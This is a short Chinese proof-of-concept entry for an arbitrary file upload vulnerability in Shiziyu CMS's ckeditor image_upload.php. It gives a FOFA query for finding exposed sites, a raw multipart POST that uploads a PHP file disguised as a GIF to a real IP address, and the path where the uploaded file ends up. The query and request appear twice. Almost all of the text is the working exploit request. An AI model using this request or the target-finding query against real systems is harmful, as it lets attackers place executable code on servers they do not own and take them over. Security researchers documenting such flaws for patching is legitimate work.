# 獅子魚CMS image upload.php 任意文件上傳漏洞
==FOFA==
"/seller.php?s=/Public/login"
==Request==
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2 Host: 47.95.36.147 Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs Content-Length: 208 ------WebKitFormBoundary8UaANmWAgM4BqBSs Content-Disposition: form-data; name="files"; filename="test.php" Content-Type: image/gif ------WebKitFormBoundary8UaANmWAgM4BqBSs—
==FOFA==
"/seller.php?s=/Public/login"
==Request==
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2 Host: 47.95.36.147 Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs Content-Length: 208 ------WebKitFormBoundary8UaANmWAgM4BqBSs Content-Disposition: form-data; name="files"; filename="test.php" Content-Type: image/gif ------WebKitFormBoundary8UaANmWAgM4BqBSs—
==設置返回文件路徑==
/Common/image/uploads/xxxxx.php
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容